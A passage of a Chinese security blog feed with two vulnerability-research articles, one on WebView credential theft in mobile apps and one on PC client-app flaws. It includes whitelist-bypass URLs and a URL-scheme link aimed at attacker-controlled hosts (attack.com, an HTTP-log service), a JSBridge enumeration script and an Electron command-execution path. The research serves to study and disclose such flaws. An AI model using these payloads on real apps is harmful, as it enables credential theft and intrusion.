\u5173\u4e8e\u4e8c\u7ef4\u7801\u626b\u63cf\u7684\u65b9\u5f0f\u6bd4\u8f83\u7b80\u5355\u627e\u5230\u5165\u53e3\uff0c\u5982\u4e0a\u6587\u6240\u8bf4\u5728 APP \u90a3\u627e\u5230\u5bf9\u5e94\u529f\u80fd\u70b9\u5373\u53ef\u3002\u4ee5\u4e0b\u56fe\u6240\u793a\uff0c\u56fe\u4e2d\u6240\u5c55\u793a\u7684\u6848\u4f8b\u5c31\u662f\u6700\u7ecf\u5178\u7684\u4e8c\u7ef4\u7801\u626b\u63cf\u5165\u53e3\u8fdb\u5165 WebView \u7ec4\u4ef6\uff0c\u8bbf\u95ee\u65f6\u643a\u5e26\u4e86\u51ed\u8bc1\u5230\u8fbe\u6307\u5b9a URL \u5730\u5740\u3002\uff08\u53ef\u4ee5\u5c06 URL \u5730\u5740\u8bbe\u4e3a BurpSuite Collaborator \u7684\u5730\u5740\u6216\u7c7b\u4f3c\u6709 HTTP Log \u8bb0\u5f55\u7684\u5730\u5740\uff09<\/p>\n\n
\u5982\u56fe\u6240\u793a\u6848\u4f8b\u5b9e\u9645\u4e0a\u6709\u4e2a\u7ec6\u8282\uff0c\u5982\u4e8c\u7ef4\u7801\u5185\u5bb9\u5904\u6253\u7801\u7684\u90e8\u5206\u5373\u4e3a\u767d\u540d\u5355\u57df\u540d\uff0c\u53ef\u4ee5\u901a\u8fc7\u6293\u5305\u6216\u77e5\u9053 APP \u5f52\u5c5e\u7684\u57df\u540d\u65b9\u5f0f\u83b7\u53d6\u8be5\u90e8\u5206\u3002\u5f88\u591a APP \u4f7f\u7528 WebView \u7ec4\u4ef6\u8fdb\u884c\u8bbf\u95ee\u65f6\uff0c\u4f1a\u5224\u65ad\u5f53\u524d\u8bbf\u95ee\u7684\u9875\u9762 URL \u5730\u5740\u4e2d\u7684\u57df\u540d\u90e8\u5206\uff0c\u6709\u4e9b APP \u5728\u6b64\u5904\u5224\u65ad\u65f6\u6bd4\u8f83\u5bbd\u677e\uff0c\u4f8b\u5982\u5224\u65ad\u57df\u540d\u662f\u5426\u5305\u542b\u67d0\u57df\u540d\u3002\u56e0\u6b64\u53ef\u4ee5\u901a\u8fc7\u4e00\u4e9b\u683c\u5f0f\u5bf9\u6b64\u8fdb\u884c\u7ed5\u8fc7\uff0c\u5982\uff1ahttp:\/\/\u767d\u540d\u5355\u57df\u540d.HTTPLog.com<\/code>\u3001http:\/\/\u767d\u540d\u5355\u57df\u540d@HTTPLog.com<\/code>\u3002<\/p>\n\n
\"\"<\/p>\n\n
URL Scheme \u8df3\u8f6c<\/h4>\n\n
URL Scheme \u6309\u5e38\u89c4\u903b\u8f91\u9700\u8981\u901a\u8fc7\u5de5\u5177\u67e5\u770b APP \u6240\u58f0\u660e\u7684\u4fe1\u606f\uff0cAPK \u683c\u5f0f\u5c31\u662f\u6587\u4ef6\u5185\u7684 AndroidManifest.xml<\/code> \u6587\u4ef6\uff0cIPA \u683c\u5f0f\u5c31\u662f\u6587\u4ef6\u5185\u7684 Info.plist<\/code> \u6587\u4ef6\u3002\u4f46\u662f\u672c\u6587\u4e0d\u505a\u504f\u9006\u5411\/\u767d\u76d2\u4fa7\u7684\u5206\u4eab\uff0c\u4ece\u9ed1\u76d2\u89d2\u5ea6\u51fa\u53d1\u83b7\u53d6 URL Scheme\u3002<\/p>\n\n
\u4e3a\u4ec0\u4e48\u53ef\u4ee5\u4ece\u9ed1\u76d2\u51fa\u53d1\u83b7\u53d6 URL Scheme\uff1f<\/strong> \u8fd8\u662f\u56de\u5230 Native UI \u4e0e WebView\uff0c\u56e0\u4e3a WebView \u4f1a\u53bb\u8bbf\u95ee\u4e00\u4e9b\u4e1a\u52a1\/\u529f\u80fd\u9875\u9762\uff0c\u56e0\u6b64\u5f00\u53d1\u4e5f\u4f1a\u5728 WebView \u7f51\u7ad9\u4e2d\u53bb\u5199\u5165 APP \u7684 URL Scheme \u4fe1\u606f\uff0c\u4ece\u800c\u8c03\u8d77 APP \u5185\u7684\u4e00\u4e9b Native \u529f\u80fd\uff0c\u56e0\u6b64\u53ea\u8981\u53ef\u4ee5\u8fdb\u884c\u6293\u5305\u5373\u53ef\u901a\u8fc7\u6b63\u5219\u5339\u914d\u7684\u65b9\u5f0f\u83b7\u53d6\u5230\u5b8c\u6574\u7684 URL Scheme \u4fe1\u606f\u3002<\/p>\n\n
\u5982\u4e0b\u56fe\u6240\u793a\u6848\u4f8b\u903b\u8f91\u4e3a\uff1a<\/p>\n\n
    \n  
  1. \u901a\u8fc7\u7b14\u8005\u6240\u5f00\u53d1\u7684 HaE \u5de5\u5177\u914d\u5408 BurpSuite \u8fdb\u884c\u6293\u5305\uff0c\u89c4\u5219\u5c31\u4f1a\u83b7\u53d6\u5230\u6293\u5305\u8fc7\u7a0b\u4e2d\u6240\u51fa\u73b0\u7684 URL Scheme \u4fe1\u606f\uff1axxx:\/\/clause\/WebView?url=<\/code>\u3002<\/li>\n  
  2. \u5f97\u5230\u8be5\u4fe1\u606f\u4e4b\u540e\uff0c\u5c06\u5176\u4e2d\u7684 url \u53c2\u6570\u8bbe\u4e3a HTTPLog \u5730\u5740\uff1axxx:\/\/clause\/WebView?url=http:\/\/HTTPLog.com<\/code>\u3002<\/li>\n  
  3. \u5728 iOS \u73af\u5883\u4e0b\u5373\u53ef\u901a\u8fc7\u6d4f\u89c8\u5668\u590d\u5236\u6784\u5efa\u597d\u7684\u5730\u5740\u76f4\u63a5\u6253\u5f00\u7136\u540e\u8df3\u8f6c\u5230 APP \u5185\u7684 WebView \u8bbf\u95ee\u754c\u9762\u3002\u5728 Android \u73af\u5883\u4e0b\uff0c\u5219\u53ef\u4ee5\u6309\u4e0a\u6587\u4e2d\u63d0\u5230\u7684 HTML \u4ee3\u7801\u65b9\u5f0f\u8fdb\u884c\u3002<\/li>\n  
  4. \u6700\u540e\u5728 HTTPLog \u670d\u52a1\u4e2d\u5373\u53ef\u67e5\u770b\u662f\u5426\u83b7\u53d6\u5230\u4e86\u51ed\u8bc1\u4fe1\u606f\uff0c\u5982\u679c\u6ca1\u6709\u4e5f\u53ef\u4ee5\u5c1d\u8bd5\u7ed5\u8fc7\uff0c\u4e0e\u4e8c\u7ef4\u7801\u626b\u63cf\u5904\u7684\u7ed5\u8fc7\u903b\u8f91\u662f\u4e00\u6837\u7684\u3002<\/li>\n<\/ol>\n\n
    \"\"<\/p>\n\n
    JSBridge \u83b7\u53d6<\/h3>\n\n
    \u903b\u8f91\u4e0e\u53d1\u73b0<\/h4>\n\n
    JSBridge \u662f\u4e00\u79cd\u5728 App \u4e2d\u5b9e\u73b0 JavaScript \u4e0e Native \u4ee3\u7801\u901a\u4fe1\u7684\u6280\u672f\u65b9\u5f0f\uff0c\u53ef\u4ee5\u5c06 Web \u9875\u9762\u4e2d\u7684 JavaScript \u8c03\u7528\u6620\u5c04\u5230\u539f\u751f\u529f\u80fd\u4e2d\u3002\u5f88\u591a APP \u5728\u4f7f\u7528 JSBridge \u6620\u5c04 JavaScript \u4e0e Native \u65b9\u6cd5\u65f6\uff0c\u672a\u5bf9\u8c03\u7528\u6765\u6e90\u7684\u57df\uff08Origin\uff09\u8fdb\u884c\u6821\u9a8c\u6216\u767d\u540d\u5355\u9650\u5236\uff0c\u5bfc\u81f4\u4efb\u610f\u7f51\u9875\u6216\u7b2c\u4e09\u65b9\u811a\u672c\u5747\u53ef\u901a\u8fc7 JavaScript \u76f4\u63a5\u8c03\u7528\u6ce8\u518c\u7684 Native \u63a5\u53e3\u3002<\/p>\n\n
    \u8fd9\u4e9b\u88ab\u6ce8\u518c\u7684\u63a5\u53e3\uff0c\u53ef\u4ee5\u662f\u5168\u5c40\u53d8\u91cf\u3001\u65b9\u6cd5\u3001\u5bf9\u8c61\u7b49\u7c7b\u578b\u3002\u5728 JavaScript \u4e2d\u5168\u5c40\u5b9e\u9645\u4e0a\u5c31\u662f\u7a97\u53e3\u5bf9\u8c61 Window\u3002\u4e5f\u5c31\u610f\u5473\u7740\u8fd9\u4e9b\u63a5\u53e3\u90fd\u4f1a\u88ab\u6ce8\u518c\u5230 Window \u4e0b\u9762\u3002\u56e0\u6b64\uff0c\u53ea\u8981\u8fdb\u5165\u5230 WebView \u7ec4\u4ef6\u5185\u5c31\u53ef\u4ee5\u901a\u8fc7\u904d\u5386 Window \u5168\u5c40\u5bf9\u8c61\u7684\u65b9\u5f0f\u6765\u627e\u5230\u88ab APP \u6240\u6ce8\u518c\u7684\u63a5\u53e3\u3002<\/p>\n\n
    \u5982\u4e0b\u4ee3\u7801\u6240\u793a\u5c31\u662f\u4e00\u4e2a\u7b80\u6613\u7684 Window \u5168\u5c40\u5bf9\u8c61\u904d\u5386\u4ee3\u7801\u3002\u5b83\u7684\u7f3a\u70b9\u5f88\u660e\u663e\uff0c\u5982\u56fe\u6240\u793a\u4f1a\u5c06\u6d4f\u89c8\u5668\/\u7ec4\u4ef6\u81ea\u5e26\u7684\u4e00\u4e9b\u65b9\u6cd5\u904d\u5386\u51fa\u6765\uff0c\u56e0\u6b64\u5c31\u9700\u8981\u52a0\u5165\u8f93\u51fa\u8fc7\u6ee4\u529f\u80fd\uff0c\u4ece\u800c\u5e2e\u52a9\u6211\u4eec\u66f4\u65b9\u4fbf\u7684\u8fdb\u884c APP \u6ce8\u518c\u63a5\u53e3\u7684\u5bfb\u627e\u3002<\/p>\n\n
    <body>\n<\/body>\n<script>\n    Object.keys(window).forEach(key => { document.body.innerHTML += `<pre>${key}:${window[key]}<\/pre>`; });\n<\/script>\n<\/code><\/pre>\n\n
    \u51ed\u8bc1\u83b7\u53d6<\/h4>\n\n
    \u4f9d\u65e7\u4f7f\u7528 HaE \u7684\u89c4\u5219\u901a\u8fc7\u6293\u5305\u7684\u65b9\u5f0f\u6765\u83b7\u53d6\u5230 WebView \u7684 URL Scheme \u4fe1\u606f\uff1axxx:\/\/promotion\/web<\/code>\uff0c\u6709\u4e9b URL Scheme \u4fe1\u606f\u9700\u8981\u5206\u6790\u4e1a\u52a1 JavaScript \u6587\u4ef6\u4e2d\u7684\u903b\u8f91\uff0c\u5982\u56fe\u6240\u793a\u5728\u57fa\u7840\u7684 URL \u4fe1\u606f\u4e0a\u8fd8\u6709\u4e00\u4e2a\u53c2\u6570 url<\/code>\uff1axxx:\/\/promotion\/web?url=<\/code>\u3002<\/p>\n\n
    \"\"<\/p>\n\n
    \u5982\u4e0b\u56fe\u6240\u793a\u6848\u4f8b\u903b\u8f91\u4e3a\uff1a<\/p>\n\n
      \n  
    1. \u7f16\u5199 A \u6807\u7b7e\u8df3\u8f6c\u9875\u9762\uff0c\u7528\u4e8e\u6307\u5b9a WebView \u7ec4\u4ef6\u8df3\u8f6c\u9875\u9762\uff1a<a href=\"xxx:\/\/promotion\/web?url=http:\/\/\u53ef\u4fe1\u57df\u540d.attack.com\/WebView\/0.html\">Click Me<\/a><\/code>\u3002<\/li>\n  
    2. \u6253\u5f00\u8df3\u8f6c\u9875\u9762\u70b9\u51fb A \u6807\u7b7e\uff0c\u8c03\u7528\u8d77\u76ee\u6807 APP \u7684 WebView \u7ec4\u4ef6\u8bbf\u95ee\u81ea\u52a8\u5316\u904d\u5386\u811a\u672c\u9875\u9762\uff0c\u5206\u6790\u53d1\u73b0 czbInfo.getAppInfo<\/code> \u65b9\u6cd5\u53ef\u4ee5\u83b7\u53d6\u51ed\u8bc1\u3002<\/li>\n  
    3. \u6784\u5efa JavaScript \u5916\u5e26\u4ee3\u7801\u7528\u4e8e\u9a8c\u8bc1\u51ed\u8bc1\u53ef\u4ee5\u7ecf\u8fc7\u7f51\u7edc\u8fdb\u884c\u8fdc\u7a0b\u83b7\u53d6\u3002<\/li>\n<\/ol>\n\n
      \"\"<\/p>\n\n
      \u603b\u7ed3\u4e0e\u601d\u8003<\/h2>\n\n
      \u672c\u6587\u4ece\u9ed1\u76d2\u6d4b\u8bd5\u7684\u89c6\u89d2\uff0c\u68b3\u7406\u4e86\u9488\u5bf9\u79fb\u52a8\u7aef WebView \u7ec4\u4ef6\u7684\u6f0f\u6d1e\u6316\u6398\u8def\u5f84\u3002\u4f46\u662f WebView \u7ec4\u4ef6\u4e0d\u4ec5\u4ec5\u662f\u79fb\u52a8\u7aef\u7684\u7279\u6709\u4ea7\u7269\uff0c\u968f\u7740\u7c7b CEF \uff08Chromium\u5d4c\u5165\u5f0f\u6846\u67b6\uff09\/ \u7c7b Electron \u6846\u67b6\u7684\u51fa\u73b0\uff0cPC\u5ba2\u6237\u7aef\u4e5f\u540c\u6837\u9762\u4e34\u7740 WebView \u7ec4\u4ef6\u653b\u51fb\u98ce\u9669\u3002<\/p>\n\n
      \u629b\u51fa\u4e24\u4e2a\u601d\u8003\uff1a\u9664\u4e86\u83b7\u53d6\u51ed\u8bc1\u5916\u662f\u5426\u5b58\u5728\u5176\u4ed6\u66f4\u9ad8\u7ef4\u5ea6\u7684\u5229\u7528\u9762\uff1f\u9664\u4e86APP\u81ea\u8eab\u6821\u9a8c\u7f3a\u9677\u5916\u662f\u5426\u5b58\u5728\u7cfb\u7edf\u5c42\u7684\u6821\u9a8c\u4e0d\u4e25\u683c\u95ee\u9898\uff1f<\/p>\n","pubDate":"2025-12-26T00:00:00+08:00","link":"https:\/\/gh0st.cn\/archives\/2025-12-26\/1","guid":"https:\/\/gh0st.cn\/archives\/2025-12-26\/1"},{"title":"\u88ab\u5ffd\u89c6\u7684\u6697\u9762\uff1a\u5ba2\u6237\u7aef\u5e94\u7528\u6f0f\u6d1e\u6316\u6398\u4e4b\u65c5","description":"
      \u88ab\u5ffd\u89c6\u7684\u6697\u9762\uff1a\u5ba2\u6237\u7aef\u5e94\u7528\u6f0f\u6d1e\u6316\u6398\u4e4b\u65c5<\/h1>\n\n
      \u524d\u8a00<\/h2>\n\n
      \u57282023\u5e7412\u670815\u65e5\uff0c\u6211\u6709\u5e78\u53c2\u52a0\u4e86\u7531\u201c\u5b57\u8282\u8df3\u52a8\u5b89\u5168\u4e2d\u5fc3\u201d\u4e3e\u529e\u7684\u201c\u5b89\u5168\u8303\u513f\u201d\u6c99\u9f99\u6d3b\u52a8\u3002\u4f5c\u4e3a\u201c\u4e2d\u5b5a\u4fe1\u606f\u5143\u4ea8\u5b9e\u9a8c\u5ba4\u201d\u7684\u4e00\u5458\uff0c\u6211\u88ab\u9080\u8bf7\u5206\u4eab\u540d\u4e3a\u201c\u88ab\u5ffd\u89c6\u7684\u6697\u9762\uff1a\u5ba2\u6237\u7aef\u5e94\u7528\u6f0f\u6d1e\u6316\u6398\u4e4b\u65c5\u201d\u7684\u6280\u672f\u8bae\u9898\u3002<\/p>\n\n
      \u5ba2\u6237\u7aef\u5e94\u7528\u6f0f\u6d1e\u662f\u8bb8\u591a\u4eba\u5728\u8fdb\u884c\u6f0f\u6d1e\u6316\u6398\u548c\u5b89\u5168\u6d4b\u8bd5\u65f6\u5bb9\u6613\u5ffd\u89c6\u7684\u9886\u57df\u3002\u968f\u7740\u6280\u672f\u7684\u66f4\u8fed\u548c\u653b\u9632\u624b\u6bb5\u7684\u5347\u7ea7\uff0c\u5ba2\u6237\u7aef\u5e94\u7528\u6f0f\u6d1e\u4e5f\u9010\u6e10\u51fa\u73b0\u5728\u5927\u4f17\u89c6\u91ce\u4e2d\uff08APT\u653b\u51fb\u3001\u653b\u9632\u8d5b\u4e8b\u7b49\u7b49\uff09\uff0c\u5728\u672c\u6b21\u8bae\u9898\u4e2d\uff0c\u6211\u4eec\u5c06\u91cd\u70b9\u5173\u6ce8PC\u4fa7\u7684\u5ba2\u6237\u7aef\u5e94\u7528\u7a0b\u5e8f\uff0c\u5982\u5373\u65f6\u901a\u8baf\u3001\u8fdc\u7a0b\u670d\u52a1\u3001\u89c6\u9891\u8f6f\u4ef6\u7b49\u5e94\u7528\uff0c\u63a2\u7d22\u5176\u4e2d\u5b58\u5728\u7684\u6f0f\u6d1e\u548c\u6f5c\u5728\u7684\u5b89\u5168\u98ce\u9669\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u6f0f\u6d1e\u6848\u4f8b<\/h2>\n\n
      \u6f0f\u6d1e\u6848\u4f8b\u7684\u5206\u6790\u4e3b\u8981\u5206\u4e3a\u4e24\u7c7b\uff0c\u4e00\u662f\u5e38\u89c4\u98ce\u9669\u7684\u4ecb\u7ecd\u548c\u4e86\u89e3\uff0c\u4e8c\u662fRCE\u6f0f\u6d1e\u7684\u6316\u6398\u601d\u8def\u548c\u624b\u6cd5\u3002<\/p>\n\n
      \u6ce8\u610f\uff1a\u4ee5\u4e0b\u6f0f\u6d1e\u6848\u4f8b\u5747\u901a\u8fc7\u8131\u654f\u548c\u7ec6\u8282\u4e0a\u7684\u5904\u7406\u3002<\/strong><\/p>\n\n
      \u5e38\u89c4\u98ce\u9669\u7bc7<\/h3>\n\n
      \u5e38\u89c4\u98ce\u9669\u5728\u8fd9\u91cc\u6211\u5206\u4e3a\u8fd9\u51e0\u7c7b\uff1a\u4fe1\u606f\u6cc4\u9732\u3001\u767d\u5229\u7528\u3001\u903b\u8f91\u6821\u9a8c\u3001\u7f13\u51b2\u533a\u6ea2\u51fa\u3002<\/p>\n\n
      \u4fe1\u606f\u6cc4\u6f0f<\/h4>\n\n
      \u5bf9\u4e8e\u5ba2\u6237\u7aef\u7684\u4fe1\u606f\u6cc4\u9732\uff0c\u6211\u4e00\u5f00\u59cb\u91c7\u7528\u7684\u65b9\u5f0f\u5c31\u662f\u57fa\u4e8eIDA Strings\u8fdb\u884c\u654f\u611f\u7684\u5b57\u7b26\u4e32\u4fe1\u606f\u5339\u914d\uff0c\u5c06HaE\u7684\u89c4\u5219\u8f6c\u4e3aYara\u89c4\u5219\u518d\u901a\u8fc7FindCrypt3\u63d2\u4ef6\u8fdb\u884c\u5339\u914d\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u5b9e\u9645\u6548\u679c\u6ca1\u6709\u90a3\u4e48\u597d\uff0c\u4ec5\u6709\u4e00\u4e9b\u6570\u636e\u5e93\u7684\u8fde\u63a5\u914d\u7f6e\u4fe1\u606f\u6cc4\u9732\uff0c\u5e76\u4e14\u7531\u4e8e\u662f\u57fa\u4e8eIDA\u7684\u4e5f\u6ca1\u6709\u90a3\u4e48\u597d\u7684\u8fdb\u884c\u81ea\u52a8\u6279\u91cf\u5316\u53d1\u73b0\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \"\"<\/p>\n\n
      \u6211\u4eec\u53ef\u4ee5\u501f\u52a9Strings<\/code>\u5de5\u5177\u6765\u5feb\u901f\u7684\u83b7\u53d6\u53ef\u6267\u884c\u6587\u4ef6\u7684\u5b57\u7b26\u4e32\u5185\u5bb9\uff0c\u5e76\u901a\u8fc7\u6b63\u5219\u6216\u5176\u4ed6\u65b9\u5f0f\u8fdb\u884c\u5339\u914d\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u767d\u5229\u7528<\/h4>\n\n
      \u767d\u5229\u7528\u95ee\u9898\u5c31\u8001\u751f\u5e38\u8c08\u4e86\uff0c\u5728\u7ea2\u961f\u7684\u5de5\u4f5c\u4e2d\u4e5f\u7ecf\u5e38\u9047\u5230\uff0c\u5982DLL\u6587\u4ef6\u6ca1\u6709\u7ecf\u8fc7\u6bd4\u5bf9\u5bfc\u81f4\u7684\u52ab\u6301\u95ee\u9898\u3001\u5e26\u6709\u7b7e\u540d\u7684\u7a0b\u5e8f\u53ef\u4ee5\u901a\u8fc7\u53c2\u6570\u7684\u65b9\u5f0f\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002\u56e0\u6b64\u5728\u8fd9\u91cc\u5c31\u4e0d\u8fc7\u591a\u7684\u8d58\u8ff0\u4e86\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \"\"<\/p>\n\n
      \u903b\u8f91\u6821\u9a8c<\/h4>\n\n
      \u5f88\u591a\u5ba2\u6237\u7aef\u7a0b\u5e8f\u5728\u5bf9\u7528\u6237\u4fe1\u606f\u8fdb\u884c\u83b7\u53d6\u7684\u65f6\u5019\u4f1a\u901a\u8fc7\u5185\u5b58\u7684\u65b9\u5f0f\uff0c\u6765\u83b7\u53d6\u7528\u6237\u7684\u7f16\u53f7\uff0c\u4ece\u800c\u57fa\u4e8e\u6b64\u8fdb\u4e00\u6b65\u6765\u83b7\u53d6\u7528\u6237\u7684\u4fe1\u606f\u3002\u7136\u800c\u8fd9\u79cd\u65b9\u5f0f\u5e76\u4e0d\u662f\u5b8c\u5168\u53ef\u4fe1\u7684\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7CE\u6765\u5bf9\u5185\u5b58\u8fdb\u884c\u4fee\u6539\uff0c\u4ece\u800c\u5bfc\u81f4\u8d8a\u6743\u6f0f\u6d1e\u7684\u4ea7\u751f\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u8fd9\u7c7b\u95ee\u9898\u5f88\u7ecf\u5178\uff0c\u5728\u4ee5\u5f80\u5c31\u6709\u8bb8\u591a\u6848\u4f8b\uff08wooyun-2015-0143395\u3001wooyun-2014-048606\uff09\uff0c\u4f46\u73b0\u5728\u4ecd\u7136\u53ef\u4ee5\u4ece\u4e00\u4e9b\u4e3b\u6d41\u7684\u5e94\u7528\u4e0a\u53d1\u73b0\u5230\u7c7b\u4f3c\u7684\u5b89\u5168\u95ee\u9898\u3002<\/p>\n\n
      \u7f13\u51b2\u533a\u6ea2\u51fa<\/h4>\n\n
      \u7f13\u51b2\u533a\u6ea2\u51fa\u95ee\u9898\u592a\u591a\u592a\u591a\u4e86\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u901a\u8fc7IDA\u63d2\u4ef6VulFi\u5b9a\u4f4d\u8106\u5f31\u70b9\uff0c\u5f88\u8f7b\u677e\u7684\u5728\u4e00\u4e9b\u5ba2\u6237\u7aef\u5e94\u7528\u4e0a\u627e\u5230\u5806\u3001\u6808\u6ea2\u51fa\u95ee\u9898\u3002\u9664\u6b64\u4e4b\u5916\uff0c\u4e5f\u53ef\u4ee5\u901a\u8fc7Boofuzz\u6765\u5bf9\u5ba2\u6237\u7aef\u5e94\u7528\u5f00\u542f\u7684\u672c\u5730\u7f51\u7edc\u670d\u52a1\u8fdb\u884cFuzz\uff0c\u4ece\u800c\u627e\u5230\u6ea2\u51fa\u95ee\u9898\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u9664\u4e86\u672c\u5730\u7f51\u7edc\u670d\u52a1\u4ee5\u5916\uff0c\u6700\u7ecf\u5178\u7684\u3001\u5229\u7528\u6700\u591a\u7684\u8fd8\u662f\u7279\u5b9a\u6587\u4ef6\u683c\u5f0f\u5904\u7406\u5ba2\u6237\u7aef\uff0c\u5982\u5e38\u7528\u7684Word\u3001Excel\u3002\u6211\u5728\u5b9e\u9645\u6316\u6398\u7684\u8fc7\u7a0b\u4e2d\u627e\u5230\u4e86\u4e00\u4e9b\u56fe\u7247\u5904\u7406\u7684\u5ba2\u6237\u7aef\u7a0b\u5e8f\uff0c\u5b83\u7528\u4e8e\u5404\u79cd\u5404\u6837\u7684\u56fe\u7247\u5904\u7406\uff0c\u6211\u4eec\u53ef\u4ee5\u627e\u4e00\u4e9b\u6bd4\u8f83\u4e0d\u5e38\u89c1\u7684\u56fe\u7247\u683c\u5f0f\uff0c\u5e76\u4e14\u901a\u8fc7\u7f51\u76d8\u8d44\u6e90\u627e\u5230\u4e00\u4e9b\u6837\u672c\u6587\u4ef6\uff0c\u4e22\u7ed9GPT\u6216IFFA\u6765\u5206\u6790\u6587\u4ef6\u683c\u5f0f\uff0c\u5e76\u8f93\u51faPits\u811a\u672c\uff0c\u901a\u8fc7Peach Fuzzer\u6765\u8fdb\u884cFuzz\u5de5\u4f5c\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      RCE\u7bc7<\/h3>\n\n
      \u63a5\u7740\u6211\u4eec\u6765\u5230RCE\u7bc7\uff0c\u8bf7\u6ce8\u610f\u8fd9\u91cc\u7684RCE\u5e76\u4e0d\u662fPre Auth\u7684\uff0c\u6848\u4f8b\u4e2d\u63d0\u5230\u7684\u5927\u591a\u9700\u89811 Click\u8fdb\u884c\u4ea4\u4e92\u624d\u80fd\u5229\u7528\u3002\u4f46\u4e5f\u4e0d\u662f\u7edd\u5bf9\uff0c\u5982\u679c\u4e00\u4e9b\u5ba2\u6237\u7aef\u7684\u7f51\u7edc\u670d\u52a1\u7aef\u53e3\u662f\u76d1\u542c\u57280.0.0.0\u7684\uff0c\u53ea\u8981\u4f60\u4e0e\u76ee\u6807\u673a\u5668\u5904\u4e8e\u540c\u4e00\u4e2a\u7f51\u7edc\uff0c\u6216\u8be5\u5ba2\u6237\u7aef\u662f\u5728\u670d\u52a1\u5668\u4e0a\u4f7f\u7528\u7684\uff0c\u4e5f\u4e00\u6837\u53ef\u4ee5\u5b9e\u73b00 Click\u7684\u6548\u679c\u3002<\/p>\n\n
      Web\u7c7b\u5ba2\u6237\u7aef<\/h4>\n\n
      Web\u7c7b\u5ba2\u6237\u7aef\uff0c\u6211\u7684\u5b9a\u4e49\u662f\u57fa\u4e8eHTML\u3001CSS\u3001JS\u7b49Web\u524d\u7aef\u6280\u672f\u6240\u6784\u5efa\u7684\u5ba2\u6237\u7aef\u5e94\u7528\u7a0b\u5e8f\uff0c\u5982Electron\u8fd9\u7c7bCEF\uff08\u6d4f\u89c8\u5668\u5d4c\u5165\u5f0f\uff09\u6846\u67b6\u5f00\u53d1\u7684\u5ba2\u6237\u7aef\u5e94\u7528\uff0c\u4ee5\u53ca\u57fa\u4e8e\u6e32\u67d3\u5f15\u64ce\uff08\u5982Wke\uff09\u6240\u5f00\u53d1\u7684\u5ba2\u6237\u7aef\u5e94\u7528\u3002<\/p>\n\n
      \u67d0IM\u5ba2\u6237\u7aef\u5e94\u7528<\/h5>\n\n
      \u5982\u4e0b\u56fe\u6240\u793a\uff0c\u662f\u4e00\u4e2a\u5373\u65f6\u901a\u8baf\u5ba2\u6237\u7aef\u5e94\u7528\uff0c\u6211\u5728\u7fa4\u540d\u79f0\u91cd\u547d\u540d\u65f6\u53d1\u73b0\u4e86\u4e00\u4e2a\u53cd\u5c04XSS\u6f0f\u6d1e\uff0c\u6839\u636e\u5176\u76ee\u5f55\u7ed3\u6784\u6211\u77e5\u9053\u5b83\u662f\u4e00\u4e2a\u57fa\u4e8eElectron\u5f00\u53d1\u7684\u7a0b\u5e8f\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u5728Electron\u6846\u67b6\u4e0b\uff0c\u5982\u679c\u5f00\u53d1\u8005\u5728\u6e32\u67d3\u9875\u9762\u65f6\u914d\u7f6enodeIntegration<\/code>\u4e3atrue\uff0c\u5219\u8bf4\u660e\u6211\u4eec\u53ef\u4ee5\u5728\u524d\u7aef\u4e2d\u4f7f\u7528Nodejs\u7684\u8bed\u6cd5\uff0c\u8fd9\u5c31\u5bfc\u81f4\u6211\u4eec\u53ef\u4ee5\u76f4\u63a5\u5728\u524d\u7aef\u4f7f\u7528\u5982\u4e0bNodejs\u4ee3\u7801\u6267\u884c\u547d\u4ee4\uff1a<\/p>\n\n
      require('child_process').exec(...);\n<\/code><\/pre>\n\n
      \u4f46\u662f\u8fd9\u4e2a\u914d\u7f6e\u9879\u5728\u521b\u5efa\u529f\u80fd\u7a97\u53e3\u65f6\u5e76\u6ca1\u6709\u5f00\u542f\uff1a<\/p>\n\n
      \"\"<\/p>\n\n
      \u6240\u4ee5\uff0c\u6211\u4eec\u4e5f\u5c31\u6ca1\u529e\u6cd5\u901a\u8fc7XSS\u6267\u884cNodejs\u7684\u4ee3\u7801\uff0c\u4f46\u662f\u6839\u636e\u5f53\u524d\u7684Electron\u7684\u7248\u672c1.8.7\u53bb\u4e92\u8054\u7f51\u68c0\u7d22\uff0c\u53d1\u73b0\u8fd9\u4e2a\u7248\u672c\u5b58\u5728\u4e00\u4e2a\u5386\u53f2\u6f0f\u6d1e\uff1aCVE-2018-15685\uff0c\u800c\u540e\u8fdb\u884c\u76f8\u5173\u9a8c\u8bc1\uff0c\u4e5f\u65e0\u6cd5\u6210\u529f\u3002<\/p>\n\n
      \u4f46\u662f\u6211\u4eec\u5728\\resources\\app\\src\\inject\\preload.js<\/code>\u6587\u4ef6\u4e2d\uff08\u8fd9\u662f\u9884\u52a0\u8f7dJS\uff0c\u4e5f\u5c31\u8868\u793a\u8fd9\u4e2a\u6587\u4ef6\u5728\u7a97\u53e3\u521b\u5efa\u540e\uff0c\u9875\u9762\u521b\u5efa\u524d\u5c31\u6267\u884c\u4e86\uff09\uff0c\u53d1\u73b0\u4e86\u6ce8\u518c\u7684\u5168\u5c40\u53d8\u91cf\uff1a<\/p>\n\n
      window.ZxDesktop = ZxDesktop;\n<\/code><\/pre>\n\n
      \u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u76f4\u63a5\u53bb\u8c03\u7528\u8fd9\u4e2a\u5168\u5c40\u53d8\u91cf\uff0c\u4ece\u800c\u53bb\u4f7f\u7528\u5176\u5185\u90e8\u7684\u5b9a\u4e49\u7684\u4e00\u4e9b\u529f\u80fd\uff1a<\/p>\n\n
      \"\"<\/p>\n\n
      \u8be5\u5168\u5c40\u53d8\u91cf\u5b9e\u9645\u4e0a\u5bfc\u51fa\u4e86\u5f88\u591a\u5176\u4ed6\u6a21\u5757\u53ca\u5bf9\u5e94\u65b9\u6cd5\uff1a<\/p>\n\n
      \"\"<\/p>\n\n
      \u6211\u4eec\u8ddf\u8fdbFile\u6a21\u5757\uff0c\u5c31\u53ef\u4ee5\u53d1\u73b0\u5b58\u5728\u4e00\u4e2aopen\u51fd\u6570\uff1a<\/p>\n\n
      \"\"<\/p>\n\n
